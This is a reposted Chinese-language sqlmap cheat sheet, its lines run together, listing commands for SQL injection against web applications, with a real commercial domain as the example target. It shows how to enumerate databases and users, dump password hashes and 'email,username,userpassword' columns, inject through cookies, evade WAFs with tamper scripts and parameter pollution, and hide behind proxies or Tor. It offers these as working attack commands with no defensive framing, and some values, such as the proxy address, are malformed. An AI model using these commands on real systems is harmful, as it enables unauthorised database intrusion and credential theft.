本文共 1726 字,大约阅读时间需要 5 分钟。
sqlmap -u http://www.baidu.com/news_show.aspx?id=97 检测注入点是否可用 sqlmap -u http://www.baidu.com/news_show.aspx?id=97 --tables 列出当前web数据库所有表名nmap --script=vuln 漏洞扫描脚本sqlmap -u 注入点 检测注入点是否可用sqlmap -u 注入点 --dbs sqlmap -u 注入点 --batch 自动输入暴库Web当前使用的数据库sqlmap -u 注入点 --current-dbWeb数据库使用的账户sqlmap -u 注入点 --current-user列出sqlserver所有用户sqlmap -u 注入点 --users 列出表中字段 sqlmap -u 注入点 --passwords列出数据库中的表sqlmap -u 注入点 -D tourdata --tables (-D指定数据库名称)sqlmap -u注入点-D tourdata -T userb -C “email,username,userpassword” --dump (将结果导出) sqlmap -u 注入点 -D tourdata -T userb --columns爆字段内容指定导出特定范围字段内容sqlmap -u “注入点” --cookie “id=97” --level 2 sqlmap -u注入点-D tourdata -T userb -C “email,username,userpassword”--start 1 --stop 10 --dump (1,10行数)Cookie注入sqlmap -u “注入点” --table --cookie “id=97” --level 2python sqlmap.py -u “注入点” -f --banner --dbs --users sqlmap -u “注入点” --columns -T “user” --cookie “id=97” --level 2sqlmap -u “注入点” --dump -C “username,password”--columns -T “user” --cookie “id=97” --level 2可对以上参数进行结合使用绕过防火墙注入确认是否开了WAFSqlmap -u “注入点” --delay=3.5 --time-sec=60 Sqlmap -u “注入点” --thread 10 --identify-waf (首选)sqlmap -u “注入点” --thread 10 --check-waf 备选使用参数绕过Sqlmap -u “注入点” --random-agent -v 2 (浏览器绕过)Sqlmap -u “注入点” --hpp -v 3 (参数污染绕过)sqlmap -u “注入点” --mobile 对移动端的服务器进行注入 Sqlmap -u “注入点” --proxy=211.211.211.211.8080 --proxy-cred=211.:985 代理注入sqlmap -u “注入点” --ignore-proxy 禁止用代理注入,直接注入sqlmap -u “注入点” --flush-session 清空会话,重构注入sqlmap -u “注入点” -hex 或者--no-cast 进行字符码转换sqlmap -u “注入点” --tor 匿名注入脚本注入的格式sqlmap -u “注入点” --tamper=A.py,B.py A,B是脚本 将payload进行URL编码注入sqlmap -r 1.txt --tamper=charencode
转载地址:http://kmmen.baihongyu.com/